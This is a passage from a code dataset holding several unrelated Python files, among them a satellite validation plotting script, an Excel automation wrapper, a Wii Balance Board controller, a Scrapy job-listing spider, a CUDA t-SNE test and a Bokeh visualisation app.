leadtimes:\n inpath = (args.path\n + args.mod + '/satellites/altimetry'\n + '/' + args.sat + '/'\n + 'CollocationFiles/'\n + fc_date.strftime('%Y/%m/'))\n filename_coll = fc_date.strftime(args.mod\n + \"_vs_\" + args.sat\n + \"_for_\" + args.reg\n + \"_coll_ts_lt\"\n + \"{:0>3d}\".format(element)\n + \"h_%Y%m.nc\")\n dtime, sHs, mHs = get_arcmfc_ts(inpath + filename_coll)\n dtime_lst.append(dtime)\n sHs_lst.append(sHs)\n mHs_lst.append(mHs)\n\n# Make scatter-plots\nfor i in range(len(leadtimes)):\n filename_fig = fc_date.strftime(args.mod\n + \"_vs_\" + args.sat\n + \"_for_\" + args.reg\n + \"_fig_val_scatter\"\n + \"_lt{:0>3d}\".format(leadtimes[i])\n + \"h_%Y%m.png\")\n make_val_scatter_fig_op(mHs_lst[i],sHs_lst[i],filename_fig,leadtimes,i)\n\n# clean up\noutpath = (args.path\n + args.mod + '/satellites/altimetry'\n + '/' + args.sat + '/'\n + 'ValidationFigures/'\n + fc_date.strftime('%Y/%m/'))\ncmd = 'mkdir -p ' + outpath\nos.system(cmd)\ncmd = 'mv ' + args.mod + '*_fig_val*.png ' + outpath\nos.system(cmd)\n","sub_path":"apps/op/support/op_figures.py","file_name":"op_figures.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23431290","text":"from multiprocessing import Pool\n\n\ndef cube(number):\n return number * number * number\n\n\nif __name__ == \"__main__\":\n numbers = range(10)\n\n p = Pool()\n\n # by default this allocates the maximum number of available\n # processors for this task --> os.cpu_count()\n result = p.map(cube, numbers)\n\n # or\n # result = [p.apply(cube, args=(i,)) for i in numbers]\n\n p.close()\n p.join()\n\n print(result)\n","sub_path":"Multiprocessing/process_pool.py","file_name":"process_pool.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"594440312","text":"import win32com.client as win32\nimport re\n\nclass Excel:\n def __init__(self,filename = None):\n self.xlapp = win32.Dispatch('Excel.Application')\n if filename:\n self.filename = filename\n self.xlbook = self.xlapp.Workbooks.Open(filename)\n else:\n self.xlbook = self.xlapp.Workbooks.Add()\n self.filename = ''\n self.xlapp.Visible = False #隐藏操作excel\n self.xlapp.DisplayAlerts = False #不弹出提示\n\n\n def creatSheet(self, before=None , after = None , name=None):\n sht = self.xlbook.Worksheets.Add(Before = before,After =after)\n if name:\n sht.Name = name\n\n def renameSheet(self, sheet , name):\n try:\n self.xlbook.Worksheets(sheet).Name = name\n except Exception as e:\n print(e.args[0])\n\n\n def save(self,savefilename = None):\n if savefilename:\n self.filename = savefilename\n self.xlbook.SaveAs(savefilename)\n else:\n self.xlbook.Save()\n\n def close(self):\n self.xlbook.Close(SaveChanges=False)\n self.xlapp.Application.Quit()\n\n def getCell(self, sheet , row , col):\n \"get value of one cell\"\n sht =self.xlbook.Worksheets(sheet)\n return sht.Cells(row , col).Value\n\n def setCell(self, sheet , row , col , value):\n \"set value of one cell\"\n sht = self.xlbook.Worksheets(sheet)\n sht.Cells(row , col).Value = value\n\n def getRange(self, sheet , row1 , col1 , row2 , col2):\n \"get values of a range\"\n sht = self.xlbook.Worksheets(sheet)\n return sht.Range(sht.Cells(row1,col1),sht.Cells(row2,col2)).Value\n\n def setRange(self, sheet , top_row ,left_col , values):\n sht = self.xlbook.Worksheets(sheet)\n right_col = left_col + len(values[0]) - 1\n bottom_row = top_row + len(values) - 1\n sht.Range(sht.Cells(top_row, left_col), sht.Cells(bottom_row, right_col)).Value = values\n\n def getContiguousRange(self, sheet , row , col):\n sht = self.xlbook.Worksheets(sheet)\n bottom = row\n while sht.Cells(bottom + 1, col).Value not in [None, '']:\n bottom += 1\n right = col\n while sht.Cells(col, right+1).Value not in [None, '']:\n right += 1\n return sht.Range(sht.Cells(row, col), sht.Cells(bottom, right)).Value\n\n def fixStringsAndDates(self, aMatrix):\n # converts all unicode strings and times\n newmatrix = []\n for row in aMatrix:\n newrow = []\n for cell in row:\n if cell is None:\n newrow.append('')\n elif isinstance(cell,str):\n cell = cell.strip()\n if is_int(cell):\n newrow.append(str(int(cell)))\n else:\n newrow.append(cell)\n else:\n newrow.append(str(cell))\n # if isinstance(cell, win32.pywintypes.UnicodeType):\n # newrow.append(str(cell))\n # elif isinstance(cell, win32.pywintypes.TimeType):\n # newrow.append(str(cell))\n # elif cell is None:\n # newrow.append('')\n # else:\n # newrow.append(cell)\n newmatrix.append(newrow)\n return newmatrix\n\n def setCellFormat(self, sheet , row , col ,format_str):\n \"\"\"format_str: \"@\" 设置A1单元格为文本格式\n \"yyyy/m/d\" '设置B1单元格为日期格式\n \"[$-F400]h:mm:ss AM/PM\" '设置C1单元格为时间格式\n \"0.00%\" '设置D1单元格为百分比格式\n \"0.00E+00\" '设置E1单元格为科学记数法格式\n \"G/通用格式\" '设置F1单元格为常规格式\n \"\"\"\n sht = self.xlbook.Worksheets(sheet)\n sht.Cells(row , col).NumberFormatLocal = format_str\n\n def setRangeFormat(self, sheet , row1 , col1 , row2 , col2 ,format_str):\n sht = self.xlbook.Worksheets(sheet)\n sht.Range(sht.Cells(row1, col1), sht.Cells(row2, col2)).NumberFormatLocal = format_str\n\n\n\n\n\ndef is_int(num):\n pattern = re.compile('^[-+]?[0-9]+(\\.0*)?$')\n result = re.match(pattern,num)\n if result:\n return True\n else:\n return False\n\ndef is_float(num):\n pattern = re.compile('^[-+]?[0-9]+(\\.[0-9]*)?$')\n result = re.match(pattern,num)\n if result:\n return True\n else:\n return False","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"300066248","text":"from wiiboard import wiiboard\nimport pygame\nimport time\nimport ButtonNames\n\n\ndef main():\n board = wiiboard.Wiiboard()\n\n pygame.init()\n\n address = board.discover()\n board.connect(address) # The wii board must be in sync mode at this time\n\n time.sleep(0.1)\n board.setLight(True)\n done = False\n\n b = b'z'\n attacking = False\n while not done:\n time.sleep(0.05)\n for event in pygame.event.get():\n if event.type == wiiboard.WIIBOARD_MASS:\n if event.mass.totalWeight > 10: # 10KG. otherwise you would get alot of useless small events!\n print (\"--Mass event-- Total weight: \" + str(event.mass.totalWeight) + \". Top left: \" + str(event.mass.topLeft))\n\n # leanThreadhold = event.mass.totalWeight / 3.5\n # bottomLeadThreshhold = event.mass.totalWeight / 1.5\n leanPercent = 2.5\n leanDownPercent = 5\n attackPercent = 7\n leftMass = event.mass.topLeft + event.mass.bottomLeft + .001\n rightMass = event.mass.topRight + event.mass.bottomRight + .001\n topMass = event.mass.topLeft + event.mass.topRight + .001\n bottomMass = event.mass.bottomLeft + event.mass.bottomRight + .001\n\n if b == ButtonNames.LEFT_STICK_UP:\n b = ButtonNames.LEFT_STICK_UP_STOP\n print (\"Stopping jump\")\n elif b == ButtonNames.A_PRESS and leftMass / rightMass < attackPercent:\n b = ButtonNames.A_RELEASE\n print (\"Stopping left attack\")\n elif b == ButtonNames.B_PRESS and rightMass / leftMass < attackPercent:\n b = ButtonNames.B_RELEASE\n print (\"Stopping right attack\")\n elif leftMass / rightMass > attackPercent:\n b = ButtonNames.A_PRESS\n print (\"ATTACK from the LEFT\")\n elif rightMass / leftMass > attackPercent:\n b = ButtonNames.B_PRESS\n print (\"ATTACK from the RIGHT\")\n elif leftMass / rightMass > leanPercent:\n print (\"LEANING LEFT\")\n percentLeaning = 100 - (rightMass / leftMass * 100)\n print (\"PERCENT LEANING: \" + str(percentLeaning))\n elif rightMass / leftMass > leanPercent:\n print (\"LEANING RIGHT\")\n percentLeaning = 100 - (leftMass / rightMass * 100)\n print (\"PERCENT LEANING: \" + str(percentLeaning))\n elif topMass / bottomMass > leanPercent:\n print (\"LEANING UP\")\n percentLeaning = 100 - (bottomMass / topMass * 100)\n print (\"PERCENT LEANING: \" + str(percentLeaning))\n elif bottomMass / topMass > leanDownPercent:\n print (\"LEANING DOWN\")\n percentLeaning = 100 - (bottomMass / topMass * 100)\n print (\"PERCENT LEANING: \" + str(percentLeaning))\n else:\n print (\"STOPPING\")\n\n else:\n b = ButtonNames.LEFT_STICK_UP\n print (\"JUMPING\")\n\n # etc for topRight, bottomRight, bottomLeft. buttonPressed and buttonReleased also available but\n # easier to use in seperate event\n\n elif event.type == wiiboard.WIIBOARD_BUTTON_PRESS:\n print (\"Button pressed!\")\n\n elif event.type == wiiboard.WIIBOARD_BUTTON_RELEASE:\n print (\"Button released\")\n done = True\n\n # Other event types:\n # wiiboard.WIIBOARD_CONNECTED\n # wiiboard.WIIBOARD_DISCONNECTED\n\n board.disconnect()\n pygame.quit()\n\n\n# Run the script if executed\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/wiiBoardTest.py","file_name":"wiiBoardTest.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128172719","text":"import sys\n\ninfile = open('unit.xyz', 'r')\nL = float(sys.argv[1])\noutfile = open('unit%s.xyz'%str(L), 'w')\nfor line in infile:\n col = line.split()\n try:\n out = '$atom:{0:<10}@atom:{1:<10}{2:<10}{3:<10}{4:<10}\\n'.format(col[0], col[0], float(col[1])*L, float(col[2])*L, float(col[3])*L)\n except:\n out = line\n outfile.write(out)\n","sub_path":"SiO2/addF/h075/unitCellData/relative2real.py","file_name":"relative2real.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117524417","text":"# -*- coding: utf-8 -*-\n#########################################################################\n# 网站: 疯狂Java联盟 #\n# author yeeku.H.lee kongyeeku@163.com #\n# #\n# version 1.0 #\n# #\n# Copyright (C), 2001-2018, yeeku.H.Lee #\n# #\n# This program is protected by copyright laws. #\n# #\n# Program Name: #\n# #\n#
Date: #\n#########################################################################\n\nimport scrapy\nfrom ZhipinSpider.items import ZhipinspiderItem\n\nclass JobPositionSpider(scrapy.Spider):\n # 定义该Spider的名字\n name = 'job_position'\n # 定义该Spider允许爬取的域名\n allowed_domains = ['zhipin.com']\n # 定义该Spider爬取的首页列表\n start_urls = ['https://www.zhipin.com/c101280100/h_101280100/']\n \n # 该方法负责提取response所包含的信息\n # response代表下载器从start_urls中每个URL下载得到的响应\n def parse(self, response):\n # 遍历页面上所有//div[@class=\"job-primary\"]节点\n for job_primary in response.xpath('//div[@class=\"job-primary\"]'):\n item = ZhipinspiderItem()\n # 匹配//div[@class=\"job-primary\"]节点下/div[@class=\"info-primary\"]节点\n # 也就是匹配到包含工作信息的元素\n info_primary = job_primary.xpath('./div[@class=\"info-primary\"]')\n item['title'] = info_primary.xpath('./h3/a/div[@class=\"job-title\"]/text()').extract_first()\n item['salary'] = info_primary.xpath('./h3/a/span[@class=\"red\"]/text()').extract_first()\n item['work_addr'] = info_primary.xpath('./p/text()').extract_first()\n item['url'] = info_primary.xpath('./h3/a/@href').extract_first()\n # 匹配//div[@class=\"job-primary\"]节点下./div[@class=\"info-company\"]节点下\n # 的/div[@class=\"company-text\"]的节点\n # 也就是匹配到包含公司信息的元素\n company_text = job_primary.xpath('./div[@class=\"info-company\"]' + \n '/div[@class=\"company-text\"]')\n item['company'] = company_text.xpath('./h3/a/text()').extract_first()\n company_info = company_text.xpath('./p/text()').extract()\n if company_info and len(company_info) > 0:\n item['industry'] = company_info[0]\n if company_info and len(company_info) > 2:\n item['company_size'] = company_info[2]\n # 匹配//div[@class=\"job-primary\"]节点下./div[@class=\"info-publis\"]节点下\n # 也就是匹配到包含发布人信息的元素\n info_publis = job_primary.xpath('./div[@class=\"info-publis\"]')\n item['recruiter'] = info_publis.xpath('./h3/text()').extract_first()\n item['publish_date'] = info_publis.xpath('./p/text()').extract_first()\n yield item\n\n # 解析下一页的链接\n new_links = response.xpath('//div[@class=\"page\"]/a[@class=\"next\"]/@href').extract()\n if new_links and len(new_links) > 0:\n # 获取下一页的链接\n new_link = new_links[0]\n # 再次发送请求获取下一页数据\n yield scrapy.Request(\"https://www.zhipin.com\" + new_link, callback=self.parse)\n\n ","sub_path":"h0Pythonweb/codes/20/ZhipinSpider_pygal/ZhipinSpider/spiders/job_position.py","file_name":"job_position.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"599998046","text":"\n\nimport numpy as np\nimport math\nfrom numba import cuda\nfrom numba import float64\nimport sys\nfrom timeit import default_timer as timer\nimport os\n\n\nthreadsperblock = (32, 32)\n\n@cuda.jit\ndef _compute_sum_of_q_on_gpu(t_sne, partial_sum_q):\n\n i, j = cuda.grid(2)\n\n n = t_sne.shape[0]\n m = t_sne.shape[0]\n\n tx = cuda.threadIdx.x\n ty = cuda.threadIdx.y\n\n bx = cuda.blockIdx.x\n by = cuda.blockIdx.y\n\n # make and fill up with the q value shared memory among threads of one block\n block_shared_mem = cuda.shared.array(threadsperblock, dtype=float64)\n\n block_shared_mem[tx, ty] = 0\n if j >= 0 and j <= n - 1 and i >= 0 and i <= m - 1:\n # get the distance between 2 data points\n temp = 0\n for dim in range(t_sne.shape[1]):\n temp += (t_sne[i, dim] - t_sne[j, dim])*(t_sne[i, dim] - t_sne[j, dim])\n #distance = math.sqrt(temp)\n block_shared_mem[tx, ty] = 1 / (1 + temp)\n\n cuda.syncthreads()\n\n # sum up the values of the shared memory array to generate a partial summation matrix (that needs to be summed up\n # further on the cpu)\n\n t = threadsperblock[0] // 2\n while t > 0:\n if tx < t:\n block_shared_mem[tx, ty] = block_shared_mem[tx, ty] + block_shared_mem[tx + t, ty]\n t //= 2\n cuda.syncthreads()\n\n t = threadsperblock[0] // 2\n while t > 0:\n if ty < t and tx == 0:\n block_shared_mem[tx, ty] = block_shared_mem[tx, ty] + block_shared_mem[tx, ty + t]\n t //= 2\n cuda.syncthreads()\n\n if tx == 0 and ty == 0:\n partial_sum_q[bx, by] = block_shared_mem[0, 0]\n\n cuda.syncthreads()\n\n\n@cuda.jit(fastmath=True)\ndef _compute_gradient_on_gpu(t_sne, values_p, indices_p, sum_q, delta):\n\n n, m, l = cuda.grid(3)\n\n if n >= 0 and n < t_sne.shape[0] and m >= 0 and m < t_sne.shape[0]:\n\n if l > 0 and l < indices_p.shape[1] + 1 and indices_p[n, l - 1] == m:\n p_value = values_p[n, l - 1]\n\n temp = 0\n for dim in range(t_sne.shape[1]):\n temp += (t_sne[n, dim] - t_sne[m, dim]) * (t_sne[n, dim] - t_sne[m, dim])\n #distance = math.sqrt(temp)\n q = 1 / (1 + temp)\n\n mult = (p_value - q / sum_q[0]) * q\n\n if n is not m:\n for dim in range(t_sne.shape[1]):\n delta[n, dim] += (t_sne[n, dim] - t_sne[m, dim]) * mult\n\n return\n\n if l == 0:\n p_value = 0\n\n temp = 0\n for dim in range(t_sne.shape[1]):\n temp += (t_sne[n, dim] - t_sne[m, dim]) * (t_sne[n, dim] - t_sne[m, dim])\n #distance = math.sqrt(temp)\n q = 1 / (1 + temp)\n\n mult = (p_value - q / sum_q[0]) * q\n\n if n is not m:\n for dim in range(t_sne.shape[1]):\n delta[n, dim] += (t_sne[n, dim] - t_sne[m, dim]) * mult\n\n return\n\n\n@cuda.jit(fastmath=True)\ndef _compute_iteration_on_gpu(t_sne, values_p, indices_p, sum_q, delta, uy, gains, momentum, eta):\n\n n, m, l = cuda.grid(3)\n\n # Make sure we are within range for m and n\n if n >= 0 and n < t_sne.shape[0] and m >= 0 and m < t_sne.shape[0]:\n\n # Calculate the delta. Use l as an index to the 2nd dimension of the p values and indices (3 * perplexity)\n if l > 0 and l < indices_p.shape[1] + 1 and indices_p[n, l - 1] == m:\n p_value = values_p[n, l - 1]\n\n distance = 0\n for dim in range(t_sne.shape[1]):\n distance += (t_sne[n, dim] - t_sne[m, dim]) * (t_sne[n, dim] - t_sne[m, dim])\n q = 1 / (1 + distance)\n\n mult = (p_value - q / sum_q[0]) * q\n\n if n is not m:\n for l in range(t_sne.shape[1]):\n delta[n, l] += (t_sne[n, l] - t_sne[m, l]) * mult\n\n if l == 0:\n p_value = 0\n\n distance = 0\n for dim in range(t_sne.shape[1]):\n distance += (t_sne[n, dim] - t_sne[m, dim]) * (t_sne[n, dim] - t_sne[m, dim])\n q = 1 / (1 + distance)\n\n mult = (p_value - q / sum_q[0]) * q\n\n if n is not m:\n for dim in range(t_sne.shape[1]):\n delta[n, dim] += (t_sne[n, dim] - t_sne[m, dim]) * mult\n\n cuda.syncthreads()\n\n # Calculate the new t-sne. Use l as an index to the dimensionality of the t-sne space (2 or 3)\n if m == 0 and l >= 0 and l < t_sne.shape[1]:\n sign_check = delta[n, l] * uy[n, l]\n if sign_check >= 0:\n gains[n, l] *= 0.95\n else:\n gains[n, l] += 0.05\n if gains[n, l] < 0.01:\n gains[n, l] = 0.01\n\n uy[n, l] = momentum[0] * uy[n, l] - eta[0] * gains[n, l] * delta[n, l]\n\n t_sne[n, l] += uy[n, l]\n\n cuda.syncthreads()\n\n'''\ngains[np.argwhere(np.sign(dy) != np.sign(uy))] += 0.05\ngains[np.argwhere(np.sign(dy) == np.sign(uy))] *= 0.95\ngains[np.argwhere(gains < 0.01)] = 0.01\n\n# update gradient\nuy = momentum * uy - eta * gains * dy\ny += uy\n\n# zero mean solution\ny = pylab.demean(y, axis=0)\n'''\ndef _put_array_to_device(array, array_name, dtype=np.float64, verbose=True):\n s = timer()\n temp = np.array(array, dtype=dtype)\n d_array = cuda.to_device(temp)\n e = timer()\n if verbose:\n print(' Load ' + array_name + ' to device time: ' + str(e - s))\n return d_array\n\n\ndef main():\n base_folder = r'D:\\Data\\George\\Projects\\SpikeSorting\\Neuroseeker\\Neuroseeker_2016_12_17_Anesthesia_Auditory_DoubleProbes\\AngledProbe\\KilosortResults'\n\n perplexity = 100\n\n\n indices_p = np.load(os.path.join(base_folder, r'indices_p.npy'))\n values_p = np.load(os.path.join(base_folder, r'values_p.npy'))\n num_dims = 2\n\n extender = 1\n n = indices_p.shape[0] * extender\n print(n)\n tsne = np.array(np.random.random((n, num_dims)), dtype=np.float32)\n\n indices_p = np.tile(indices_p, (extender, 1))\n values_p = np.tile(values_p, (extender, 1))\n\n verbose = True\n threadsperblock = (32, 32)\n blockspergrid_x = math.ceil(tsne.shape[0] / threadsperblock[0])\n blockspergrid_y = math.ceil(tsne.shape[0] / threadsperblock[1])\n blockspergrid = (blockspergrid_x, blockspergrid_y)\n\n num_of_dims = tsne.shape[1]\n partial_sum_q = np.zeros(blockspergrid)\n cuda.profile_start()\n t1s = timer()\n d_tsne = _put_array_to_device(tsne, 't_sne', np.float64, verbose)\n d_partial_sum_q = _put_array_to_device(partial_sum_q, 'partial_sum_q', np.float64, verbose)\n t2s = timer()\n _compute_sum_of_q_on_gpu[blockspergrid, threadsperblock](d_tsne, d_partial_sum_q)\n partial_sum_q = d_partial_sum_q.copy_to_host()\n t2e = timer()\n print('Time to run the sum of q on the gpu = ' + str(t2e - t2s))\n\n t3s = timer()\n sum_q = np.sum(partial_sum_q)\n t3e = timer()\n print('Time to run the sum of q on the cpu = ' + str(t3e - t3s))\n print(sum_q)\n\n d_sum_q = _put_array_to_device(sum_q, 'sum_q', np.float64, verbose)\n\n\n delta = np.zeros((n, num_of_dims))\n uy = np.zeros((n, num_dims))\n gains = np.ones((n, num_dims))\n momentum = [0.5]\n eta = [200]\n d_indices_p = _put_array_to_device(indices_p, 'indices_p', dtype=np.float64, verbose=verbose)\n d_values_p = _put_array_to_device(values_p, 'values_p', dtype=np.float64, verbose=verbose)\n d_delta = _put_array_to_device(delta, 'delta', dtype=np.float64, verbose=verbose)\n d_uy = _put_array_to_device(uy, 'uy', dtype=np.float64, verbose=verbose)\n d_gains = _put_array_to_device(gains, 'gains', dtype=np.float64, verbose=verbose)\n d_momentum = _put_array_to_device(momentum, 'momentum', dtype=np.float64, verbose=False)\n d_eta = _put_array_to_device(eta, 'eta', dtype=np.float64, verbose=False)\n\n threadsperblock = (8, 8, 8)\n blockspergrid_x = math.ceil(tsne.shape[0] / threadsperblock[0])\n blockspergrid_y = math.ceil(tsne.shape[0] / threadsperblock[1])\n blockspergrid_z = math.ceil((indices_p.shape[1] + 1) / threadsperblock[2])\n blockspergrid = (blockspergrid_x, blockspergrid_y, blockspergrid_z)\n\n\n t4s = timer()\n _compute_iteration_on_gpu[blockspergrid, threadsperblock](d_tsne, d_values_p, d_indices_p, d_sum_q, d_delta, d_uy,\n d_gains, d_momentum, d_eta)\n #_compute_gradient_on_gpu[blockspergrid, threadsperblock](d_tsne, d_values_p, d_indices_p, d_sum_q, d_delta)\n t4e = timer()\n print('Time to run one iteration on gpu = ' + str(t4e - t4s))\n t_sne = d_tsne.copy_to_host()\n t1e = timer()\n cuda.profile_stop()\n print('Time to copy t_sne to host = ' + str(t1e-t4e))\n print('Total time = ' + str(t1e - t1s))\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"spikesort_tsne/python/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":8796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"586124840","text":"import pandas as pd\nfrom bokeh.plotting import figure, output_notebook, show, output_file\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.models.tools import HoverTool, BoxSelectTool, LassoSelectTool, PointDrawTool\nfrom random import random\n\nfrom bokeh.layouts import row, column\nfrom bokeh.models import CustomJS, ColumnDataSource\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.models.widgets import DataTable, DateFormatter, TableColumn, NumberFormatter, HTMLTemplateFormatter, Panel, Tabs\nfrom bokeh.io import output_file, show\nfrom bokeh.layouts import widgetbox,layout\nfrom bokeh.models.widgets import Slider, Div, Button, Toggle\nfrom bokeh.models.glyphs import Text\nfrom os.path import dirname,join\nfrom bokeh.io import curdoc\n\nbase=[\"Institutions\"]\nlong=['Démocratie, Institutions']\n\nfor ix in range(0, len(base)):\n b=base[ix]\n ti=long[ix]\n i=b+\".csv\"\n o=b+\".html\"\n df = pd.read_csv(i)\n df['lcol']=\"#00000000\"\n df.ptcex=df.ptcex*10\n df['id']=list(df.index)\n df['txt_alpha']=0\n df2=df.copy(deep=True)\n source=ColumnDataSource(df)\n s2 = ColumnDataSource(data=dict(id=[], n_vote=[], vote=[], title=[], body=[]))\n filsource=ColumnDataSource(df2)\n output_file(o)\n #wi=900\n div = Div(text=\"\"\"Sélectionner des points pour afficher les satistiques.\"\"\")\n# div = Div(text=\"\"\"Sélectionner des points pour afficher les satistiques.\"\"\", width=wi, height=50)\n\n p1 = figure(plot_height=600, title=ti, tools='box_select,lasso_select,box_zoom,wheel_zoom,reset', plot_width=900)\n# p1 = figure(plot_height=600, plot_width=wi, title=ti, tools='box_select,lasso_select,box_zoom,wheel_zoom')\n\n r1=p1.circle('tsneX', 'tsneY', source=filsource, alpha=0.6, size='ptcex', color='ptcol', line_color=\"lcol\", line_width=3)\n txt=Text(x='tsneX', y='tsneY', text='title', text_alpha='txt_alpha', text_align='center')\n p1.add_glyph(filsource, txt)\n \n hover = HoverTool()\n hover.tooltips=[\n ('Votes', '@n_vote'),\n ('Adoption', '@vote'),\n ('Titre', '@title')]\n hover.renderers=[r1]\n\n p1.add_tools(hover)\n tool = PointDrawTool(renderers=[r1], num_objects=2000)\n p1.add_tools(tool)\n\n filsource.selected.js_on_change('indices', CustomJS(args=dict(source=filsource, s2=s2, div=div), code=\"\"\"\n var inds = cb_obj.indices;\n var d1 = source.data;\n var d2 = s2.data;\n d2['vote'] = []\n d2['n_vote'] = []\n d2['title'] = []\n d2['body'] = []\n d2['id'] = []\n var totvot=0;\n var tota=0\n for (var i = 0; i < inds.length; i++) {\n d2['vote'].push(d1['vote'][inds[i]])\n d2['n_vote'].push(d1['n_vote'][inds[i]])\n d2['title'].push(d1['title'][inds[i]])\n d2['body'].push(d1['body'][inds[i]])\n d2['id'].push(d1['id'][inds[i]])\n totvot=totvot+d1['n_vote'][inds[i]]\n tota=tota+d1['n_vote'][inds[i]]*d1['vote'][inds[i]]\n }\n tota=tota/totvot;\n s2.change.emit();\n div.text=\"Total votes: \"+totvot;\n div.text=div.text+\"
Approbation: \";\n div.text=div.text+tota;\n \"\"\")\n )\n\n s2.selected.js_on_change('indices', CustomJS(args=dict(source=filsource, s2=s2, div=div), code=\"\"\"\n var inds = cb_obj.indices;\n var d1 = source.data;\n var d2 = s2.data;\n toselect = []\n var totvot=0\n var tota=0\n for (var i = 0; i < inds.length; i++) {\n toselect.push(d2['id'][inds[i]])\n totvot=totvot+d2['n_vote'][inds[i]]\n tota=tota+d2['n_vote'][inds[i]]*d2['vote'][inds[i]]\n }\n\n //alert(toselect)\n for (var i = 0; i < d1['id'].length; i++) {\n for(var j = 0; j < toselect.length; j++){\n if(d1['id'][i]==toselect[j])\n {\n d1['lcol'][i]=\"#b22222ff\"\n break;\n }else{\n d1['lcol'][i]=\"#00000000\"\n }\n\n }\n }\n source.change.emit();\n tota=tota/totvot;\n div.text=\"Total votes: \"+totvot;\n div.text=div.text+\"
Approbation: \";\n div.text=div.text+tota;\n div.text=div.text+\"
Sélection:\";\n div.text=div.text+toselect\n \"\"\")\n )\n\n filtervote=CustomJS(args=dict(source=source, filsource=filsource, s2=s2, div=div), code=\"\"\"\n var cutoff_n = nvote.value;\n var cutoff = vote.value;\n var showtxt = txt.active;\n cutoff=cutoff/100;\n var mastersrc= source.data;\n var plotsrc = filsource.data;\n //var tablesrc = s2.data;\n plotsrc['vote'] = []\n plotsrc['n_vote'] = []\n plotsrc['title'] = []\n plotsrc['body'] = []\n plotsrc['id'] = []\n plotsrc['tsneX'] = []\n plotsrc['tsneY'] = []\n plotsrc['ptcol'] = []\n plotsrc['ptcex'] = []\n plotsrc['txt_alpha'] = []\n //alert(!ci.active)\n thr=0.05/(mastersrc['p_prop'].length)\n for (var i = 0; i < mastersrc['vote'].length; i++) {\n if(((mastersrc['n_vote'][i])>cutoff_n) && ( ((mastersrc['vote'][i])>cutoff) || ((mastersrc['vote'][i])<(1-cutoff)) )){\n if((!ci.active) || (mastersrc['p_prop'][i]<%= title %>')),\n TableColumn(field=\"body\", title=\"Corps\", formatter=HTMLTemplateFormatter(template='
<%= body %>
')),\n ]\n\n p2= DataTable(source=s2, columns=columns, width=1200)\n# p2= DataTable(source=s2, columns=columns, width=wi, height=400)\n\n\n end_slider=max(df.n_vote)\n nvote_slider = Slider(start=0, end=end_slider, value=0,step=10, title=\"Nombre de votes minimum\", callback=filtervote)\n filtervote.args[\"nvote\"] = nvote_slider\n vote_slider = Slider(start=50, end=100, value=50, title=\"Approbation/rejet(%)\", callback=filtervote)\n filtervote.args[\"vote\"] = vote_slider\n \n toggle = Toggle(label=\"Cacher points non significatifs\", callback=filtervote, width=50)\n toggle_expl=Div(text=\"\"\"Ce bouton masque les propositions dont l'approbation ne peut pas être distinguée statistiquement de 50%. Par exemple, une approbation de 60% ne veut presque rien dire si on la calcule sur 10 votes, par contre sur 5000 on est sûr qu'une majorité des votants est d'accord avec la proposition.Formellement, ce filtrage est obtenu par un test binomial exact bi-directionnel avec correction de Bonferroni.\"\"\")\n toggletxt = Toggle(label=\"Afficher le titre des revendications\", callback=filtervote, width=50)\n toggletxt_exp = Div(text=\"\"\"Attention: Filtrer les points et/ou zoomer avant d'afficher le texte pour que le graphique reste lisible.\"\"\")\n filtervote.args[\"ci\"]=toggle\n filtervote.args[\"txt\"]=toggletxt\n\n dl = Button(label=\"Télécharger données filtrées\", button_type=\"success\")\n dl.callback = CustomJS(args=dict(source=filsource),\n code=open(join(dirname(__file__), \"download.js\")).read())\n\n \n bbox=column([nvote_slider, vote_slider, toggle, toggle_expl, toggletxt, toggletxt_exp, dl])\n \n# l=layout([[p1, bbox]], sizing_mode='stretch_both') # sizing mode is completely broken, fixed widths it is :(\n l=layout([[p1, bbox], [div], [p2]])\n #layout = column(sli1,p1)\n l.sizing_mode = 'scale_width'\n \n #show(l)\n curdoc().add_root(l)\n","sub_path":"apps/Institutions.py","file_name":"Institutions.py","file_ext":"py","file_size_in_byte":8840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233795400","text":"\n\nclass Solution:\n\n def romanToInt(self, inputStr):\n # def convert(inputStr):\n global valueDict\n\n valueDict = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n }\n retArr = [valueDict[chr] for chr in\n inputStr] # String is also a char array. replace all characters with correponding decimal numbers\n for index, j in enumerate(retArr): # use enumerate to access the index while iterating\n try:\n if retArr[index] < retArr[index + 1]: retArr[index] = retArr[index] * -1\n except IndexError:\n continue # ignore the IndexError exception if array index is overflows while comparing the last character\n print(sum(retArr))\n return sum(retArr) # use sum to sum all values in a list\n\n\n\n#print(RomanToDecimal(\"XXXXXX\"))\nSolution().romanToInt(\"MCMXXIIX\")\n","sub_path":"guruRoman.py","file_name":"guruRoman.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350592946","text":"\"\"\"\npygame-menu\nhttps://github.com/ppizarror/pygame-menu\n\nTEST WIDGET - BUTTON\nTest Button widget.\n\nLicense:\n-------------------------------------------------------------------------------\nThe MIT License (MIT)\nCopyright 2017-2021 Pablo Pizarro R. @ppizarror\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights 